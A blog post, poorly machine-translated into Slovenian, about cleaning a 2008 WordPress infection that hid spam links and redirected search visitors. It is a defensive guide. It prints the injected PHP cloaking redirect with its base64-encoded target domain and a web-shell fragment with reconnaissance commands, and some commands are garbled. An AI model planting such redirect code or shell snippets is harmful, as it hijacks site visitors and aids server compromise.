Virusna blogosfera ... kaj pa si imel z mano?!

V zadnjem mesecu sem prejel opozorilo virus blog V nekaterih obiskovalcev. Sprva sem prezreti opozorila, ker sem namestil kar dober antivirus (Kaspersky AV 2009) In čeprav blog za dolgo časa nisem dobil opozorila virus (.. sem nekaj sumljivega videl prej, da prvi osveževanja izginila. Končno ...).
Počasi so se začeli pojavljati velike razlike prometa obiskovalecPo katerih promet je v zadnjem času nenehno upada in začel se vse več ljudi, ki mi povedo, da stealthsettings.com je virused. Včeraj sem prejel od nekoga screenshot storiti, ko antivirus blokiral script iz stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Bilo je zelo prepričljiv, da me, da sem dal vse vire iskali. Prva ideja, ki je po mojem mnenju je bil to nadgradnja Najnovejša različica WordPress (2.5.1), vendar ne preden izbrišete vse datoteke v starem skriptu WordPress in narediti baze podatkov backup. Ta postopek ni deloval in verjetno sem potreboval veliko časa, da ugotovim, kje je napaka, če mi ni povedal. Eugen V razpravi ob kavi, je ugotovil, povezava Google in bi bilo dobro, da ga vidim.
MyDigitalLife.info je objavil članek z naslovom: “WordPress Hack: Obnovite in popravite Google in iskalnik ali brez prometa piškotkov, preusmerjenega na Your-Needs.info, AnyResults.Net, Golden-Info.net in druga nezakonita spletna mesta"To je konec navoja I potrebna.
Gre za to, izkoriščanje de WordPress na podlagi piškotkov, Kar mislim, da je zelo kompleksna in je knjigo. Dovolj pameten, da bi SQL injection Baza blog, ustvariti neviden uporabnika preprost rutinski pregled Splošno->uporabniki, preverite strežnika imenikov in datotek "zapisljive" (to chmod 777), iskati in izvršiti datoteke s privilegijem root ali skupine. Ne vem, kdo izkorišča ime in videli, da je napisal o njem nekaj člankov, kljub dejstvu, da so mnogi blogi okuženi, vključno z Romunijo. Ok ... Bom poskusil, da bi poskušali razložiti splošnih informacij o virusu.

Kaj je virus?

Najprej vstavite izvorne strani, bloge, povezave nevidne za obiskovalce, vendar vidno in indeksnih za iskalnike, zlasti Google. Na ta način prenos page rank na straneh, ki jih napadalec navedenih. Drugič, vstavi se še en Preusmeritev koda URL za obiskovalce, ki prihajajo iz Googla, Live, Yahoo, ... ali bralec RSS in ne stran piškotek. antivirus zazna preusmeriti Trojan-Clicker.HTML.

Simptomi:

Ogromen upad prometa obiskovalcev, Še posebej na blogih, kjer je večina obiskovalcev prihaja iz Googla.

Identifikacija: (tukaj se težava zaplete za tiste, ki ne vedo veliko o phpmyadmin, php in linux)

LA. POZOR! Najprej naredite varnostno bazo podatkov!

1. Preverite izvorne datoteke index.php, header.php, footer.php, Blog temo in videli, če je koda, ki uporablja šifriranje base64 ali vsebuje "if ($ ser ==" 1? && sizeof ($ _ COOKIE) == 0) "v obliki:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... Ali kaj podobnega. Zbriši to kodo!

Kliknite na sliko ...

Indeks številka

Na zgornjem posnetku zaslona sem pomotoma izbral in " ". Ta koda mora ostati.

2. Uporaba phpMyAdmin in pojdite na tabelo zbirke podatkov wp_usersKje preveriti, če ni uporabniško ime ustvaril na 00:00:00 0000-00-00 (Možna namestitev user_login pisati "WordPress”. Zapišite ID tega uporabnika (polje ID) in ga nato izbrišite.

Kliknite na sliko ...

ponaredek uporabnik

* Zelena črta je treba odstraniti in obdrži svoj ID. V primeru zaspaniJe bil ID = 8 .

3. Pojdi na tabeli wp_usermeta, Kje nahaja in odstrani linije za ID (kjer polje USER_ID Prikaže vrednost ID črta).

4. V tabeli wp_optionPojdi active_plugins in glej, kaj plugin je omogočena osumljenca. Lahko se uporablja kot končičev _old.giff, _old.pngg, _old.jpeg, _new.php.giffitd. kombinacije bogatih razširitev slik z _old in _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Izbrišite ta vtičnik, nato pojdite na spletni dnevnik -> Nadzorna plošča -> Vtičniki, kjer deaktivirate in aktivirate kateri koli vtičnik.

Kliknite na sliko za ogled zdi active_plugins virus datoteko.

vključiti

Sledite pot na FTP ali SSH, navedeno active_plugins in izbrišite datoteko iz strežnika.

5. Tudi v phpMyAdmin, v tabeli wp_option, Najdi in črtati vrstico, ki vsebuje "rss_f541b3abd05e7962fcab37737f40fad8"In med"internal_links_cache ".
V internal_links_cache so narejeni šifrirana spam povezav, ki se pojavljajo v svoj blog in koda od Google Adsnape, Heker.

6. Priporočena je spremeniti geslo Blog in prijava odstraniti vse sumljive userele. Nadgradite na najnovejšo različico WordPress in nastavite blog, da preneha z registracijo novih uporabnikov. Izgube ni... lahko komentirajo tudi nenaseljeno.

Zgoraj sem poskušal nekoliko razložiti, kaj storiti v takšni situaciji, da očistim blog tega virusa. Problem je veliko bolj resen, kot se zdi, in skoraj ni rešen, ker se uporabljajo varnostnih ranljivosti spletni strežnik gostovanje, ki je blog.

Kot prvi ukrep varnosti, z dostopom SSH, Naredite nekaj testov na strežniku, da vidim, če vse datoteke, kot so * _old * in * _new. * S končičev.giff. jpeg. pngg. jpgg. Te datoteke je treba črtati. Če preimenujete datoteko, npr. top_right_old.giff in top_right_old.phpVidimo, da je slika ravno kodni strežnik podvig.

Nekaj ​​koristnih navodil za preverjanje, čiščenje in zaščito strežnika. (prek SSH)

1.  cd / tmp in preverite, če obstajajo mape, kot so tmpVFlma ali druge kombinacije ima enako ime in ga izbrisati. Glej sliki spodaj, dve takšni mape od mene:

tmpserver

rm-rf foldername

2. Preverite in odpravite (sprememba chmod-ul) po možnosti mape z atributi chmod 777

poišči vse zapisljive datoteke v trenutnem imeniku: Najdi. -Type f-perm-2-LS
našli vse zapisljive imenikov v trenutnem imeniku: Najdi. -Type d-perm-2-LS
poišči vse zapisljive imenike in datoteke v trenutnem imeniku: Najdi. -Perm-2-LS

3. Iščete sumljivih datotek na strežniku.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, POZOR !!! datoteke, ki so bile določene bit Suid si SGID. Te datoteke izvrši s privilegiji uporabnika (skupina) ali korenin, ne za uporabnike, ki izvajajo datoteko. Te datoteke lahko privede do kompromisa korenin, če varnostna vprašanja. Če uporabljate datoteke z SUID in SGID bitov, opravlja "chmod 0 " na ali odstranitev paketa jih vsebuje.

Izkoriščajo vsebuje nekje v viru ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Na ta način ... v bistvu ugotovi kršitev na področju varnosti. Vrata odpreti imenike "zapisljive" in skupina izvršilnih privilegije datoteke / root.

Nazaj z več ...

Nekateri blogi okuženih: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... Še bi lahko naštevali ... veliko.

Ali je spletni dnevnik okužen, lahko preverite z Googlovim iskalnikom. Kopiraj prilepi:

stran www.blegoo.com buy

Lahko noč in dobro delo;) Kmalu mislim, da bo Eugen prišel z novicami na foreseeable.unpredictable.com.

BRB :)

POZOR! Spreminjanje teme oz WordPress ali nadgradite na WordPress 2.5.1, NI rešitev za odpravo tega virusa.

Strasten do tehnologije, z veseljem pišem na StealthSettings.com od leta 2006. Imam bogate izkušnje s operacijskimi sistemi: macOS, Windows in Linux, ter programskimi jeziki in platformami za bloganje (WordPress) in za spletne trgovine (WooCommerce, Magento, PrestaShop).

kako » Omembe » Virusna blogosfera ... kaj pa si imel z mano?!
Pustite komentar